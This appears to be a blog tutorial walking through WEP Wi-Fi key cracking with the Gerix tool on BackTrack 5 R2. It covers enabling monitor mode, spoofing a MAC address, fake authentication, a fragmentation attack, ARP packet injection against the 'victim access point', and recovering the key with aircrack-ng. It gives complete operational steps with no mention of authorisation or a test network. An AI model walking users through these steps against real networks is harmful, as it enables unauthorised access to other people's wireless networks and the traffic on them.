I’m creating several posts at once, and I’ll be adding screen shots shortly, bear with me.
Boot up to Backtrack 5 R2. You’ll need a laptop with a wireless card that supports monitor mode and packet injection.
Applications >BackTrack > Exploitation Tools > Wireless Exploitation Tools > WLAN Exploitation > gerix-wifi-cracker-ng
Note [At the bottom of Gerix, you will see the current actions taking place, so if something goes wrong you can see exactly what it is]
With Gerix open, go to the Configuration Tab.
You should see your interface marked as wlan0. Select it, and click the button below labeled Enable/Disable Monitor Mode. The card will now be in Monitor mode.
At this point, you can also click the Set random MAC address to spoof your MAC address.
Click on the interface labeled mon0 so it’s highlighted. Underneath that, you will see a button to Rescan Networks. Click this to search for SSID’s.
Select the desired WEP network SSID.
Click the WEP tab. Click Start Sniffing and Logging. You should see the BSSID MAC loaded as well as the PWR (Signal Strength) and other data. Keep this window open.
Click Performs a test of injection AP to ensure your card is able to inject packets. You will get a message stating “Injection is working!”. You can close this window.
For this demonstration we will use WEP Attacks (no-client). Click the button labeled as such.
Under Fragmentation attack, click Associate with AP using fake auth. In the bottom data viewer window, you will see it read “Fake authentication with mon0”
Click Fragmentation attack button. Once it finds a packet, it will prompt to “Use this packet ?” Type Y for yes.
Click Create the ARP packet to be injected on the victim access point.
Click Inject the created packet on victim access point. Type Y in this box also. Keep this window open.
Go to the Cracking tab, and under WEP Cracking, click the Aircrack-ng – Decrypt WEP password button. You will be watching here for the number of IV’s. (got 10,000 IVs)
You will generally need about 10,000 – 20,000 IVs to decrypt the password and sometimes less. This can take 30 seconds to a couple minutes depending on the amount of wireless traffic. You can safely close this window, and click the button again to reopen it when it has enough IV’s.
The key will be displayed in this window when complete.